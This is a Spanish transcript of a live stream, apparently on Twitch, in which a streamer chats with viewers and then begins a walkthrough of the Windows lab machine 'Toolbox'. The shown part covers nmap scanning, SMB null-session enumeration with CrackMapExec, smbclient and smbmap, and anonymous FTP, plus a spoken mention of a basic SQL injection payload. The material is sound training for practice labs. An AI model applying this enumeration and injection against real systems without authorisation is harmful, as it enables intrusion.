¿Qué tal mis camaradas? ¿Cómo están? Bueno, ya ven que mi cámara no es la muy buena que digamos ahorita. ¿Qué tal amigos? ¿Cómo están? Bienvenidos al stream del Raptor. Déjenme ver si todo va bien. Está muy bien el asunto. Vamos a poner un poquito de musiquita para relajar el ambiente. Bueno, no tan duro, ¿no? Ahí está. ¿Qué tal amigos? ¿Cómo están? Bienvenidos al stream del Raptor. Espero que se encuentren muy bien y que la estén pasando de maravilla. Porque yo la verdad es que la estoy pasando muy muy bien, ¿eh? Bueno, he tenido algunos resultados respecto a algunos proyectos que he tenido y la verdad es que me ha parecido muy muy interesante toda esta parte de lo que he contemplado. Nada más que... Bueno, como ustedes saben, pues prácticamente estoy utilizando ahorita una cámara que pues no tiene mucha resolución. Pero bueno, mi cara no se ve tan, digamos, en HD. Pero la parte del stream, pues ustedes van a ver que los parámetros, todas aquellas cosas que nosotros manejamos, pues se ven a todo dar. Lo que no sé es si prender las luces estas verdecitas que tengo por aquí atrás. A ver, déjenme prenderlas. Ahí está. Yo creo que le dan un pequeño plus ahí a la parte de mi cama, de mi cara más bien. ¿Qué tal amigos? Pues bueno, no nos hemos visto desde el día jueves, creo, desde el día jueves que no he estado por aquí. Prácticamente he andado pues en otros lados, en otros rumbos. Y la verdad es que, pues, una, estoy contento. Dos, podríamos decirse que... Pues he estado aprendiendo muchísimo y muchísimas cosas que también yo me he estado aventurando por ahí, ¿no? Y también la parte del stream, bueno, pues he tratado de estar aquí un poquito porque ustedes saben que pues directamente ahorita estoy haciendo muchas cosas. Más que nada con lo de mi negocio porque son muchas cosas las que estoy haciendo ahorita en mi negocio. Como ahorita estoy solito y pues nadie me ayuda. Pero pues bueno, eso no es impedimento para poder crecer y poder darle duro a esto de la ciberseguridad. Y bueno, pues la verdad es que como yo les comento, bueno, pues la verdad es que he estado muy feliz, muy contento en ese aspecto. He aprendido muchas cosas y más la parte de scripting, creo que me he dedicado más a esa parte. Y también, bueno, otra cosa también, porque bueno, no he estado subiendo muchos videos, pero... Hoy subí uno en particular que bueno, la verdad es que le han dado mucho énfasis y también mucha gente ha dicho unas cosas y otra gente ha dicho otro tipo de cosas. Entonces, al final es complicado estar lidiando de ambas partes, los que están de acuerdo y los que no están de acuerdo respecto a la parte que es, por ejemplo, publiqué algo de inyecciones, ¿no? Inyecciones SQL. Pues bueno, hay gente que dice que bueno, eso ya no pasa, bueno, hay otra gente que todavía pasa, bueno, la verdad es que sí, ¿eh? Las inyecciones SQL no por nada ocupan el tercer lugar de OWASP Top 10, entonces bueno, pues hay una cierta forma de poder implementarlas todavía, aunque son muy básicas. Y bueno, ustedes saben que aquí directamente en LATAM, bueno, pues... Podríamos decirse que todavía se siguen dando algunos sistemas operativos que prácticamente están súper desactualizados. Mucha gente, muchas empresas no quiere actualizar porque, bueno, hay muchas herramientas que ocupan que directamente no les permite estar actualizando. Podríamos decirse que, que si actualizan sus sistemas operativos, posiblemente esas herramientas que ocupan para todo lo que están haciendo, pues ya no les funcione. Entonces es complicado estar actualizando los sistemas operativos y también podríamos decirse más que nada para las empresas, que es lo más pues feo, ¿no? Pero tienen que actualizarlo, tienen que actualizarle, tienen que añadir nuevas herramientas, tienen que añadir nuevas cosas porque si no, de alguna manera sus sistemas son vulnerables a cualquier tipo de ataque, no importa cuál, SQLI, XSS, LFI, RFI, SSTI, SSRF, bueno, CSRF, perdón.
Y entre muchas, muchas, muchas más, ¿no? Entonces, complicada la situación de las empresas que ahorita, en la actualidad, bueno, pues no pueden actualizar sus sistemas operativos por cuestiones de compatibilidad, por cuestiones de muchas cosas. Y lamentablemente, bueno, pues los ciberatacantes están a la orden del día para poder realizar todo ese tipo de cosas. Para poder realizar todo ese tipo de cosas. Todo va bien, vale. Entonces, recomendadísimo que actualicen, vean otras alternativas, otras herramientas que puedan estar utilizando. Bueno, veo que cuando hace enfoque, directamente la luz sí se ve como que verdecito, pero si quito mi mano, bueno, pues prácticamente está desenfocado el asunto, ¿no? Pero sí, a veces siento que es mucho verde. Bueno amigos, pues el día de hoy vamos a hacer como todos los días que vengo por acá, pues prácticamente una maquinita. Ustedes saben que pues yo estoy ahorita en la preparación. Creo que así me la pasé directamente cuando estaba haciendo el SPPT de versión 2. La verdad es que estudiaba un rato por mi cuenta, otro rato lo estaba aquí con ustedes. Y bueno, era múltiples y múltiples formas de poder estar estudiando que al final, bueno, pues ese panqué salió del horno. Y es que la verdad es que me gusta estar aquí en stream, la verdad me gusta estar aquí en stream, me gusta pasarme por aquí un ratito, me gusta de alguna manera lidiar con problemas en tiempo real. Porque hay veces que se presentan problemas en tiempo real y es que no siempre podríamos decirse que las he podido resolver. En una ocasión recuerdo que no pude llegar a obtener privilegios de root en una máquina. Entonces también yo me someto a presión porque bueno, de alguna manera me están viendo, de alguna manera están pasándose por aquí y bueno, pues eso también entra en mí en presión, ¿no? Pero la verdad es que me gusta también estar en presión porque bueno, si no estoy en presión, pues también no me someto, no me obligo yo directamente a tratar de resolver algo que se me está presentando directamente. Y bueno, pues anteriormente yo ya les había comentado que íbamos a hacer implementación también de ChatGPT, que la verdad ni lo hemos implementado. Creo que no ha hecho falta, pero sí me quedo yo de repente con una que otra duda respecto a las cosas que, bueno, directamente llegasen a pasar, podríamos decirse, a la hora de explicarlas. Porque sí hay algunas cosas que como que sí no me quedan todo del claro. Pero yo también trato como que de entenderlas, ¿no? De ver qué es lo que está pasando por detrás. Y es que a veces explicar todo, a veces estar explicando directamente todo y cada una de las cosas, es complicado. A veces no se me queda todo, la verdad, para serles sincero. Pero trato de explicar lo mejor que se pueda. Lo mejor que se pueda. Y bueno, pues otra cosa también, amigos, que ya muy pronto, como les había dicho, estoy anuncie y anuncie y anuncie que ya me voy a pasar directamente para Kick. Si alguno de ustedes me quiere seguir por allá, son bienvenidos todos, no se preocupen, todos son bienvenidos en la plataforma de Kick. Creo que es una buena plataforma como para poder empezar. Twitch, pues prácticamente me ha ayudado mucho como para crecer. Ya ahorita somos 106 personas. La verdad es que me da mucho gusto por esa parte. Pero como que siento que Twitch, de alguna manera no sé si yo soy, creo que yo soy. O de plano yo no estoy viendo de alguna manera que pues hay algo que pues pueda yo obtener aquí bien, ¿no? La verdad es que me siento muy cómodo en Twitch, pero mucha gente conoce Twitch. No mucha gente conoce Kick, la verdad, para serles sincero. Pero pues voy a intentarlo, voy a intentarlo. La cuestión aquí es que lo intente de una u otra manera. La verdad es que lo intente de una u otra manera. Porque si lo intento de alguna u otra manera, pues posiblemente en algún lugar pique, ¿no? Por ahí. Por ejemplo, miren, yo les voy a bajar por aquí esto de aquí. Esto también se los voy a bajar por acá. Vamos a darle aquí al control 3. Y bueno, si nos venimos acá para TikTok, chéquense nada más esta reverenda cosilla. Este es el video que yo les comento. Dios mío, tiene 54 mil vistas.
Creo que creo que le ganó directamente a mi video de Cali, donde yo hago una explicación breve directamente de Cali, donde cuál es mejor, si Cali o Parro, qué sistema operativo utilizar. Y la verdad es que estoy muy muy impresionado por esa parte, ¿no? Y más aparte el contenido que he subido, bueno, que subí, pues prácticamente es hablando de las inyecciones SQL básicas. No es tanto rollo, todos sabemos que directamente hoy en día las inyecciones SQL, podríamos decirse como comilla or 1 es igual a 1 y coméntame todo lo demás, pues ya no se llega a dar mucho. Que ojo, no estoy diciendo que no se llegase a dar, porque la verdad es que sí, hay lugares donde todavía se llegase a dar, ¿eh? Hay lugares donde todavía llegasen a tener vulnerabilidades directamente de esta magnitud, ¿no? Tan básicas, podríamos decirse, no tan constructivas, ¿no? Porque normalmente hay veces que se tiene que generar un script para poder dumpear la base de datos del sitio web. Pero en este caso no. Hay páginas o sitios web que todavía llegan a ser vulnerables a inyecciones básicas como esta. Entonces, hay gente que se sorprende, hay gente que, bueno, pues realmente sí dice, nah, ¿cómo crees? ¿Cómo? Eso era en el año del caldo, ¿no? Pues sí, año del caldo, pero hoy en día todavía podríamos decirse que si llegasen a ver vulnerabilidades como estas, y la verdad es que sí se llegasen a ver, amigos, la verdad es que sí se llegasen a ver. Pero bueno, se los dejo a su investigación. Chéquenlo ustedes, véanlo ustedes, chéquenlo en ese aspecto y verán cómo realmente todavía hay mucho. No por nada les digo que OWASP todavía lo califica como en tercer lugar del top 10, 10 de vulnerabilidades más comunes en los sitios web, ¿vale? Entonces, bueno, pues hoy, el día de hoy, vamos a estar tocando directamente una vulnerabilidad respecto a esto y de donde hice yo prácticamente el video, que se llama la máquina, se llama Tollbox. Hoy vamos a estar viendo esta máquina, la Tollbox. Es una máquina Windows de dificultad fácil, donde vamos a ver un poco de numeración, virtual hosting, y vamos a estar viendo un poquito, podríamos decirse, inyecciones SQL. Y la forma de cómo ganar la capacidad de ejecución remota de comandos mediante la creación de una tabla. Y la escalada de privilegios, bueno, pues la escalada de privilegios sí es una cagada, amigos, ¿vale? Entonces, ahorita ya mero le damos a esto. Ya mero le damos a esto. Déjenme por aquí pasarme. Ahí me pone unas cosas medio. Me pone algo de corrupt. Esto ya lo voy a estar resolviendo. A ver, déjenme ver por aquí. Etc. Déjenme acomodo directamente la máquina porque creo que ni la he acomodado. Ah, sí, ya la acomodé, ya la acomodé, ya la acomodé. Ahí está, ¿vale? Pues bueno, amigos, vamos a darle a la máquina. En este caso me voy a pasar para acá a administrar el stream. Déjenme paso para acá para el apartado de Stream Elements, panel de control. Me voy a pasar directamente acá a ciencia y tecnología. Es ciencia y tecnología, ciencia y tecnología, ahí está, ¿vale? Vamos a pasarnos a ciencia y tecnología y bueno, pues vamos a darle a esto de la streameada. Vamos a pasarnos para acá al número 3. Ahí está. Y buenas, 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 buenas. Buenas, Chris, ¿cómo estás? ¿Ya regresaste de vacaciones? ¿Qué tal, amigo? ¿Cómo estás? Vamos a darle a la máquina. A la máquina Tollbox. Es una máquina Windows. ¿Cómo te va, amigo? Ya tiene rato que no platicábamos. Ya tiene ratito. Sí, ya terminaron las vacaciones. Oye, qué bien. Me da mucho gusto por esa parte.
Está bien, amigo, me da mucho gusto por esa parte. La verdad es que a veces las vacaciones caen a toda madre. La verdad es que las vacaciones a veces caen a toda madre. Y por ejemplo, yo que apenas lo comenté, no sé si estuviste por ahí. La verdad es que tuve un pequeño bajón ahí respecto. Fue tanta información, creo que realmente no sé, como que sí me bugué. La verdad es que me bugué, pero bueno, pues otra vez estamos de vuelta. Estuve como una semana y casi 2 semanas así, ¿eh? 2 semanas así. Donde no quería hacer absolutamente nada. ¿Qué tal todo con tu empresa? Pues va bien, hasta ahorita va todo bien. Va bien, bueno, pues apenas voy empezando a tener clientes. La verdad es que me gusta mucho porque, bueno, al final todo esas ganancias y todo lo que estoy haciendo, pues no, pues es para mí. Pero la verdad, esto de ser emprendedor, de ser jefe y de estar organizando todo, es más de lo que yo, pues prácticamente estaba trabajando. Entonces dije, rayos. ¿Qué fue lo que hice, no? Pero bueno, pues ya estoy allá, ya estoy directamente. Podríamos decirse ya emprendiendo. Y la verdad es que me ha ido bien. No, no me quejo. La verdad es que me ha ido bien. Ahora en vez de frijolitos, ahora sí ya como huevo. Esperemos que después ya pueda hacer carne. Pero bueno, vamos a darle tiempo al tiempo para que, para que ya después podamos comer un poquito más allá de cosas, ¿no? Por ejemplo, como una birria y todo ese tipo de cosas que comíamos antes. ¿Estuviste con Burnout? ¿Estuviste con Burnout? A ver, ahí explícame. A ver, ahí explícame un poquito. Porque ya me perdí. Ya me perdí ahí en ese aspecto. Bueno, vamos a probar un nuevo sistema operativo, amigos. Vamos a estar utilizando Arch. Arch. Bueno, se ve que se va a venir dura la lluvia. Se ve que se va a venir dura la lluvia. Pero bueno, el día de hoy vamos a estar utilizando Arch, amigos. Prácticamente vamos a estar probando directamente cómo se siente Arch. Y más que nada, pues, respecto a cómo podemos acomodarnos, ¿no? Bueno, la verdad es que yo lo he estado probando. Este sistema operativo, y la verdad es que me ha funcionado muy bien. No he tenido como que problemas a la hora de estar haciendo mis proyectos ni nada por el estilo. Y la verdad es que me gusta bastante, ¿eh? La verdad es que sí me gusta bastante. Voy a aumentar un poquito aquí la letra. Pero la verdad es que sí me gusta bastante. Las actualizaciones son un poquito diferentes. Las herramientas para instalar también son un poquito diferentes. Ya las voy a estar directamente ahí instalando conforme pase el tiempo. Y bueno, podemos irse arreglando alguna que otra cosilla porque todavía no se arreglan las cosas aquí directamente. Pero bueno, pues aquí en Arch estamos jugando directamente con Alacrity, creo que es Alacrity, BC Pong, creo que es BC Pong, no, no me acuerdo cómo se llama este. Pero bueno, vamos a estar jugando un poquito con esto de Arch Linux. Este es un sistema operativo ya construido directamente, se llama Exodia OS. La verdad es que lo vi por ahí yo sumergido entre el, podríamos decirse, entre las fases y las faunas de la Deep Web. Y la verdad es que me pareció muy atractivo con todo lo que tiene. Entonces, uno tiene que estarlo investigando, viendo más cosillas, viendo cómo se contempla. Y la verdad es que me ha gustado mucho en este aspecto. Solamente, bueno, que Arch es muy diferente a Parrot. Y la verdad es que, podríamos decirse, pues tengo que estar aprendiendo nuevas cosas en la parte de Arch. Y otra cosa, bueno, pues ustedes saben que yo sufro de los ojos directamente. No veo muy bien. Entonces tengo que estar ahí asomándome para acá para poder leerlos y toda esa parte. ¿Vale? Pues bueno, compañeros de la Deep Web, vamos a empezar con esto para que no se haga tan tarde. La verdad es que estoy un poco cansado, la verdad. Estoy cansado. Y pues esto de, como les digo, de ser emprendedor, pues es un poquito cansado. Pero bueno, pues, ¿qué vamos a hacer a la primera? Pues primero que nada, vamos a lanzarle un paquete a la Deep Web, ¿no? Que en este caso, bueno, pues esta es la dirección IP. Vámonos para acá. Vamos a pegar esto por aquí así. Y vamos a ver si tenemos conectividad directamente con el host, que no me deja pegarla desde fuera, la 236. ¿Vale? Vamos a darle un enter.
Y vale, tenemos conectividad. Recuerden ustedes que si se van acá al Firefox y se abren, digamos, un navegador, y ustedes ponen autonomía hacker, se van aquí, autonomía hacker, y si ustedes se vienen para acá abajo y se van a la parte de mi GitHub, ustedes por aquí tienen una herramienta directamente que se llama Raptor Enum, ¿vale? Que si ustedes se vienen por acá, le ponen en RAW y se descargan esta herramientita. Yo, por ejemplo, me voy a ir directamente a Downloads, lo voy a descargar por aquí, y con wget, no tengo wget, a ver, vamos a hacer un sudo pacman-ss wget, vamos a ver si aparece por aquí. Ya olvidé darle de comer a mi perro. El burnout es cuando ya está súper agotado. Ah, vale. No sabía, amigo. Fíjate, no sabía eso. Bueno, pues un dato más a mi cabeza. Sí, estaba súper agotado, amigo. La verdad es que estaba súper, súper agotado. No, para serte franco, no quería hacer nada. O sea, nada, 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 nada. Y la verdad es que dije, si no me obligo directamente a hacer las cosas, si no entra mi, podríamos decirse, mi responsabilidad, mi responsabilidad más que nada, ¿no? La responsabilidad de estar y de seguir en mis proyectos, prácticamente los voy a perder. Y es que yo soy así. De repente estoy bien y de repente me da un bajón así enorme respecto cuando estoy absorbiendo mucha información que no, a veces no sé cómo lidiar con tanta información. Entonces colapso, peto directamente. Me tengo que dar unos días directamente, ya sea jugar, me voy a otro lado, estoy con el play, lo que sea. Y después vuelvo y tengo que obligarme a volver a hacerlo. Y es cuando otra vez entra esta parte, la disciplina más que nada. No sé si a ti te ha pasado alguna vez así. A ver, sería sudo pacman-s wget. Vamos a ver si me lo instala. Sí, sí me lo va a poder instalar. A ver, vamos a darle por ahí un tiempecito. Ahí está. Ahora sí, si hacemos un wget de esto, ahí está, ¿no? Ya ven que aquí directamente en Arch Linux, pues es un poquito diferente para poder estar instalando las cosas, ¿vale? Bueno, pues ahí tenemos, recuerden que yo tengo un script en Bash directamente que lo he llamado Raptor Enum, que si hacemos un chmod, le damos permisos de ejecución a Raptor Enum y lo ejecutamos. Pues prácticamente aquí tendríamos bueno, ahí me falta toilet. A ver, vamos a ver si también lo puedo instalar por aquí. Sería sudo pacman-s toilet. Sí. Sí, ya estaba súper quemado, por eso tuve que salir de vacaciones obligatorias. Pues qué bueno, amigo, qué bueno que tuviste esas vacaciones. La verdad, mis vacaciones no son tanto de irme a la playa, de irme a otro lado. Son más de salir, de ir a disfrutar una comidita, de cosillas así. A lo mejor ya en un momento ya tendré unas vacaciones más tochas. Pero mis vacaciones ahorita, bueno, son un poquito más, podríamos decirse, un poquito más relax. Pero sí, salí de esa zona y qué bueno que salí en ese aspecto. Pero la verdad, qué bueno. ¿Y qué tal te la pasaste? ¿Me trajiste un tequila o no me trajiste nada? Bueno, pues ustedes saben que yo tengo esta herramienta que se llama Raptor Enum 01, que está en forma beta. ¿Por qué? Bueno, pues porque me faltan más cosillas. Pero, bueno, ya tiene varias cosas que podemos estar aplicando. Por ejemplo, la creación de directorios. Ya puedo aplicar directamente una creación de directorios. Pero la que a mí me importa uno y por la cual voy a estar ocupando esta herramienta nada más, porque a mí me gusta hacerlo todo manual. Esto yo la implemento cuando estoy haciendo una máquina que quiero ganar tiempo, ¿vale?
Por ejemplo, voy a seleccionar la opción 1, me dice que le pase la IP directamente, que es la 10.10.10.236, y vamos a ver si estamos ante una máquina Windows o Linux. Y ojito, estamos ante una máquina con sistema operativo Windows. ¿Por qué? Pues bueno, pues en base al TTL tenemos un TTL 127. Entonces, bueno, pues a toda madre, ¿no? Ya sabemos que vamos a partir en gajos o vamos a partir en dos una máquina Linux. Vamos a darle control C, vamos a salir de esto. Y bueno, yo me voy a ir directamente a... Creo que aquí no tengo creada ninguna carpeta. Con mkdir voy a crear una carpeta que se llame... ¿sí? HTV. No. Más bien, ¿saben qué? Vamos a llamarla prácticas. Prácticas. Nos vamos a meter directamente a la misma. CD prácticas. Ahí está. Y bueno, podríamos decirse que aquí con mkdir me voy a crear una carpeta que se llame HTV, ¿vale? Me voy a meter a la misma. Ahí está. Y bueno, pues con mkdir me voy a crear mis tres carpetas, mis cuatro carpetas, que recuerden que ya me creo cuatro carpetas. Me gusta tu herramienta, ¿está en GitHub? Sí, está en GitHub. Voy a estar agregándole mucho más cosas, ¿eh? O sea, todavía mucho más cosas. De hecho, estoy implementando otra cosa que la voy a agregar directamente porque, bueno, es algo de fase de reconocimiento que nosotros hacemos. Normalmente mi herramienta, podemos decirse que es, a ver, por aquí está. Es una herramienta que pues prácticamente la he utilizado como fase de reconocimiento. Es toda esta que está aquí. Le he agregado un pequeño menú. Ahí le he agregado colores. Directamente también si quieren agregarle colores a su script. Recuerden que aquí tengo directamente también donde lo he llamado color ANSI de entradas. Y bueno, aquí ustedes pueden agregar los colores que ustedes quieran. Aquí he agregado una lista directamente y un ejemplo de cómo agregar cada color. Directamente, por ejemplo, un color rojo. Y para terminar el color reset, ¿vale? Lista de secuencias de escape ANSI. Está muy chulo, la verdad, me gusta mucho en ese aspecto. Y pues nada, mi GitHub directamente es github.com Raptor Attack. Y ahí lo pondré. También acabo de agregar uno que donde detectamos procesos. Que este normalmente siempre lo hacemos. Pero a mí me gustó mucho este porque. En el particular. Porque es como el PSPy. Te dice exactamente quién es el que está ejecutando los procesos por detrás. Si root, si www.data, si no sé, X, ¿no? Con unos parámetros diferentes, bueno, podemos obtener diferentes cosas a la hora de ver procesos cuando queramos escalar privilegios en una máquina Linux, ¿vale? Bueno, pues ahí tienen mi repositorio. Y ahí está, ¿no? Bueno, pues mkdir, aquí estaba con nmap, content, exploit y resource, ¿no? Resource, ahí está. Bueno, pues vamos a meternos a nmap y aquí me voy a poner como superusuario. Ahí está, para tener un poquito más de alcance a la hora de estar ejecutando directamente mis comandos. Mientras estuve de vacaciones me quité la Ethical Hacking Essential. ¿A poco? Órale. Órale, qué padre. Yo de Easy Conceal no he hecho nada, ¿eh? La verdad no he hecho nada. Dicen, quién sabe, dicen. ¿Tú qué opinas? ¿Esas certificaciones realmente te ayudan a entrar al campo laboral? ¿O nanay? ¿O solamente son puras calumnias? Porque la verdad yo no tengo ninguna. Ya saben, bueno, ya sabes que la CEH, creo que es la CH, directamente ya tiene una parte teórica y una parte práctica, que no sabía de la parte práctica hasta que me dijeron. Pero no sé qué tan buena sea, la verdad. ¿Qué tal, Code? ¿Qué milagro? Bueno, ya yo también, ya qué milagro, ¿no? Yo también no había estado por aquí. ¿Qué tal, amigo? Bienvenido, bienvenido al stream. La máquina que vamos a estar haciendo de hoy es la Tollbox, ¿vale? Podríamos decirse de Windows. Bueno, de Windows. Es una máquina Windows de dificultad fácil, ¿vale? Lo primerito está chulo. ¿Por qué? Porque nunca habíamos tocado algo por el estilo. Pero ya lo demás, pues bueno, ya es una pequeña cagada de la máquina.
Estaba trabajando. Órale, mi amigo, está muy bien, te mando un abrazote hasta donde estés y bueno, pues bienvenidísimo al stream, ¿vale? Que ojo, amigos, yo sé y yo sé que desde el mes pasado yo les había dicho directamente que ya nos íbamos a pasar aquí, que prácticamente ya no iba a estar por aquí. Pero he estado por aquí por la razón porque prácticamente la mayoría de mis publicaciones tiene la dirección directamente de aquí. Si ustedes se dan cuenta, pues ya somos 106 participantes, ¿no? Pero realmente sí, yo sí me quiero pasar a Kick, ¿no? Yo realmente sí me quiero pasar a Kick. Quiero dejar un poco Twitch, la verdad, quiero dejar un poco Twitch. Y quiero pasarme a Kick, ¿no? Para de alguna manera hacer historial ahí. Quiero hacer historial y quiero ya quedarme en una plataforma. Voy a estar haciendo multi-stream, de hecho, o sea, desde Kick, porque Kick te da esa flexibilidad de hacer multi-stream. Pero más que nada, hacerlo sobre Kick, hacerlo en Kick, amigos. Entonces, me voy a pasar a Kick, todos son bienvenidos a Kick. Y más que nada, bueno, pues para poder utilizar la categoría de ciberseguridad. Que ya ven que Kick sí la tiene. La categoría de ciberseguridad. Y para entender conceptos y básico y lo básico, pero para ser pro no creo. Bueno, pues para ser pro yo siempre he dicho que las certificaciones de Offensive Security son las tochas. Y bueno, ahora unas de Red Team, ¿no? Que andan por ahí, circulando en redes sociales. Pero bueno, amigos, pues la vida de hacker es difícil, es complicada la vida de hacker. Entonces, con estas certificaciones, pues hay que probarle de todo, ¿no? Pero bueno, pues ahorita le seguimos. Vamos a empezar con nuestra fase de enumeración. Recuerden que tenemos una fase de enumeración que, por ejemplo, si yo me voy directamente a... Oh, no, desde aquí lo voy a hacer, ¿vale? Desde aquí lo voy a hacer. Bueno, pues recuerden que todo esto siempre lo hacemos con Nmap. Nmap, vamos a traernos directamente nuestro script. Vamos a ocuparlo un poquito. A ver. Por ejemplo, está en downloads. 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 Ahí está. Y se llama Raptor. Raptor. A carambas. Ah, no, perdón, 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 perdón. Ah, ¿qué hice? a ver, déjeme salir por aquí. CD descargas. No, descargas. ¿Qué estoy haciendo? Download. Ah, ya. Mira aquí en Arch. Es muy diferente la carpeta. Sí existe la carpeta Downloads como root. Órale, qué chulo. Bueno, pues vamos a borrar esto de Google porque ahora sí que lo instalé. Y bueno, pues vamos a movernos lo que está en esto que dice Raptor. Esto, a Home. Raptor. Prácticas HTV en vaya, vaya, no puse el nombre de la carpeta, pero bueno, vamos a moverlos ahí. Vamos a movernos directamente aquí, a la última carpeta. Ahí está. Y bueno, aquí lo vamos a utilizar, ¿no? Vamos a mover esto que de hecho no era aquí, era en Nmap. Ahí está, déjenme muevo ahora a Nmap. Y aquí tenemos, bueno, esta es mi herramienta, ¿vale? Esta es una pequeña herramientita. Bueno, vamos a ocuparla. Vamos a darle un poquito de ocupe, porque normalmente la estoy desarrollando, pero no la he ocupado, porque la estoy desarrollando todavía. Si nosotros no la ejecutamos directamente, tenemos varias opciones, ¿vale? Primero que nada, la creación de directorio. Yo ya tengo mi creación de directorios, pero si ustedes se la ejecutan, la opción número 0 les va a crear cuatro directorios directamente de trabajo, donde ustedes ya van a poder estar ocupando el que se les venga en su regalada gana. Apenas acabamos de ocupar la opción 1, donde indicábamos directamente la IP, la 236. Y bueno, ya nos decía realmente si estábamos ante una máquina con sistema operativo Windows o Linux, en base al TTL, ¿vale?
Bueno, una vez que hayamos hecho eso, pues ahora sí podemos empezar con nuestro escaneo. Por ejemplo, yo le puedo pasar la opción 2 para hacer un escaneo de puertos. Le paso la dirección del host, que es la 236. Le proporcionamos directamente las contraseñas para que empiece a hacer. Y bueno, ahí va a empezar a hacer directamente el escaneo de puertos de la dirección que le hemos pasado. Todo esto al final, dice, al terminar el escaneo, los resultados serán almacenados en un archivo llamado ports. No publicidad. Si nosotros, por ejemplo, si yo me abro por acá una ventanita, si yo voy a prácticas, HTTP y Nmap. Creo que ahí anda un poquito, algo anda mal con mi ZSH. Vean cómo me acaba de crear un archivito que se ha llamado ports, ¿vale? Si nosotros hacemos un bat, porque aquí es bat en vez de cat, porque no he creado el alias, no se ha creado nada, pero cuando termine directamente ya tendríamos el resultado de, podríamos decir, de nuestro escaneo. Ahora vamos a esperar un poquito, vamos a ver qué show. Vamos a ver cómo va mi video de TikTok. Soy como un niño chiquito. Vamos a recargar. Y ojito, 61.300 vistas. Y bueno, y sigue creciendo. Esto la verdad está súper chulo. Y eso que fue un video bien corto y bien también bien, bien, podríamos decirse, muy, muy básico, de inyecciones SQL. Pero bueno, vamos a darle un tiempecito. Aquí no podemos ver directamente. Bueno, ahí ya acabó. Ya acabó directamente. Bueno, aquí tenemos prácticamente todo nuestro escaneo. Si nosotros, por ejemplo, si hacemos un bat a ports. Bueno, ahí lo tenemos. Pero si le indicamos a esto que es un lenguaje Java, aunque no sea Java, pues ya saben que nos lo da pues un poquito coloreado. Esto, déjenme cerrar por aquí esto. Ahí está. Esto lo vamos a pasar a la 2. Vamos a pasarnos para acá. Y aquí lo tendríamos directamente ya coloreado. Igualito que el parro. Igualito que el parro. De esta manera, bueno, pues aquí ya nada más sería cosa de darle un enter. Y ya tendríamos nuestra evidencia. Ahora, bueno. Tenemos una parte donde podemos realizar un descubrimiento de directorios y ficheros también. Y también tenemos un apartado para localizar si se está aplicando Virtual Hosting. Este me gusta mucho porque, bueno, de alguna manera, mediante el archivo ports que hemos creado, en la opción 4, mediante ese archivo, te detecta si se está aplicando Virtual Hosting, si encuentra algún nombre de dominio o de subdominio. Pero bueno, en este caso no lo vamos a hacer ahorita, vamos a dejarlo así. Vamos a cerrar esto y listo, ¿no? Pues bueno, tenemos todo esto, amigos. Tenemos todos estos puertos. Tenemos el puerto 21, puerto 22, puerto 135, 139, 443, SSL, 445, SMB. Bueno, tenemos el puerto 5985, el de administración remota de Windows. Y ustedes saben que directamente siempre que tenemos este puerto, podemos tratar de colarla por ahí. Podemos tratar de colarla. Tenemos el puerto 47001 que está corriendo HTTP y tenemos un chorro de puertos más, ¿no? Y ahí nos describe el SMB2, Security Mode. Bueno, de entrada estamos ante un Windows, un sistema operativo Windows, ¿vale? Tenemos el puerto 21 FTP y desde aquí ya nos podemos loguear como el usuario anónimo sin proporcionar contraseña. Que recuerden que a veces esto es muy bueno para poder obtener recursos. Y ya desde aquí me está poniendo un binario que se llama docker-tollbox, ¿no? Esto para mí, de entrada, yo si estoy testeando algo así como esto, no voy a saber ni qué carajo es. Entonces voy a empezar a checarlo ahí en ese aspecto. Tenemos el puerto 22 SSH, esto es extraño. Esto no es normal, digamos, ¿vale? Si llegas a pasar, no digamos que no, pero llegas a pasar. Tenemos el puerto 22 activado directamente en una máquina Windows y nos pone OpenSSH for Windows 7.7. Esto es nuevo, ¿vale? Esto no lo habíamos tocado directamente en alguna de las máquinas que hemos estado haciendo.
Ahora tenemos el puerto 135, 139, 443. Podemos inspeccionar el certificado. Y de entrada tenemos el puerto 445. Bueno, recuerden amigos, si nosotros tenemos esto, a ver, déjenme ver por aquí. Bueno, más bien esto sería aquí. Esto vamos a ponerle aquí, exit. ¿O saben qué? Voy a cerrar esta ventana de acá. Ahí está. Voy a cerrar esta ventana de acá y vamos a trabajar en esta, ¿vale? Vamos a ponerle aquí un bat a ports, indicándole que es un lenguaje Java. Vamos a bajarle un poquito a esto. Ahí está. Ahí está. Bueno, vamos a abrirnos otra ventana por aquí. Y recuerden, amigos, puerto que encontramos directamente como en máquinas Windows, que es SMB. SMB que enumeramos primero, ante todo. Siempre, siempre que estamos en una máquina Windows, siempre a enumerar primero, primero que nada, el SMB. ¿Vale? En este caso con CrackMapExec. En este caso con CrackMapExec, mediante SMB, voy a tratar de listar si realmente me estoy enfrentando ante un Windows 7. Bueno, que ahí me estaba poniendo por ahí un Windows 7 más o menos, ¿vale? Vamos a darle un Enter y vamos a ver qué nos da por ahí. Bueno, nos pone Toolbox, nombre, Toolbox, Windows. Es un Windows 10 de 64 bits. Domain, Toolbox, Signi False, SMB 1 False. Bueno, estamos ante un Windows 10 de 64 bits. Esto es muy importante saberlo. Todo esto que prácticamente estamos viendo por aquí, es muy importante saberlo, porque a la hora de nosotros cargar algún binario o algo por el estilo, tenemos que saber la arquitectura. De esta manera nosotros ya tenemos un poquito más de display directamente de lo que vamos a cargar, ¿vale? Listo. Ahora, recuerden que también está SMB Client, ¿vale? Que podemos tratar de listar recursos compartidos que nos estén compartiendo a nivel de red, donde le vamos a pasar el parámetro menos S, porque no contamos con credenciales válidas para poder entrar directamente, ¿no? Vamos a darle un Enter y vamos a ver NT Status Access Denied. Bueno, ahí nos está poniendo prácticamente que pues nanay, no tenemos manera de entrar. Si nosotros lo hacemos con SMB map, le pasamos el parámetro menos H para indicarle el host, que sería la 10.10.10.236. A ver, vamos a darle así directamente. Authentication error on. Bueno, ahí nos pone. Si nosotros no contamos con credenciales válidas, vamos a pasarle el parámetro menos N. Creo que es el parámetro menos N, o más bien menos U. Creo que es U. A ver, vamos a probarle. Null. Es el parámetro menos U. Bueno, ¿por qué? Porque no contamos con credenciales válidas, igual como lo hicimos con SMB Client. Pero de entrada no estamos viendo nada, ni tampoco yo creo que nos deje entrar por aquí, ¿vale? Entonces, con SMB Map, tanto con SMB Map, con SMB Client, pues prácticamente lo vamos a dejar por la paz, ¿vale? Vamos a seguir inspeccionando un poquito los puertos. Bueno, tenemos el puerto 21, FTP, Anon. Anonymous. En este caso, recuerden que nos podemos loguear como el usuario Anonymous. Si le ponemos FTP a la 10.10.10.10.236. Y le 